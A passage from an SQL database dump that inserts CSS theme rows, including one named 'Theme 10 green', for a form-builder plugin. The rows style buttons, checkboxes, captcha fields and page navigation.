alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #0D5492;\r\n	cursor: pointer;\r\n	background-color: #7FA6C6;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #004D8E;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00559D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00559D ), color-stop(67%, #005BA7 ), color-stop(100%, #00559D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00559D 0%, #005BA7 67%, #00559D 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FA6C6;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #0057A0;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(37, 'Theme 10 green', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8E5DB;\r\nborder: 1px solid #007616;\r\nmargin-bottom: 10px;\r\ncolor: #007616;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/03/next_hoverbg.png) url([SITE_ROOT]/images/01/03/previous_hover.png) url([SITE_ROOT]/images/01/03/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/03/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #006C14 ;\r\nbackground: -moz-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #006C14 ), color-stop(20%, #018819 ), color-stop(80%, #018819 ), color-stop(100%, #006C14 ));\r\nbackground: -webkit-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -o-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -ms-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: linear-gradient(to right, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #0DBB2C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #006C14;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D8E5DB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #006C14;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #006312 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #006312 ), color-stop(20%, #047519 ), color-stop(80%, #057C1C ), color-stop(100%, #069140 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 